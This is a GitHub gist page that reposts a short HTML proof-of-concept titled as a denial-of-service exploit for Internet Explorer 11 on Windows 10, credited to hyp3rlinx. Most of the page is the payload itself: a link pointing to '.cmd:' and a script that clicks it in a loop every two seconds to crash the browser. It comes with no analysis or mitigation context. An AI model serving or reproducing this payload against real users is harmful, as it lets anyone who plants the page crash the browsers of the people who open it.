Skip to content

Instantly share code, notes, and snippets.

@PacodiazDG
Created April 25, 2018 16:20
Show Gist options
  • Save PacodiazDG/5305593ba3474d35063118405a31f696 to your computer and use it in GitHub Desktop.
Save PacodiazDG/5305593ba3474d35063118405a31f696 to your computer and use it in GitHub Desktop.
Microsoft Internet Explorer 11.371.16299.0 Denial Of Service Exploit
<!DOCTYPE html>
<html>
<head>
<title></title>
</head>
<body>
<center>
MSIE v11.371.16299 Denial Of Service by hyp3rlinx
<br>
<a href=".cmd:" id="hate">crashy ware shee</a>
<br>
Tested successfully on Windows 10
</center>
<script>
function doit(){
document.getElementById("hate").click();
alert("DOH!");
obj.click();
obj.click();
}
setInterval("doit()", 2000)
</script>
</body>
</html>
@PacodiazDG
Copy link
Author

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment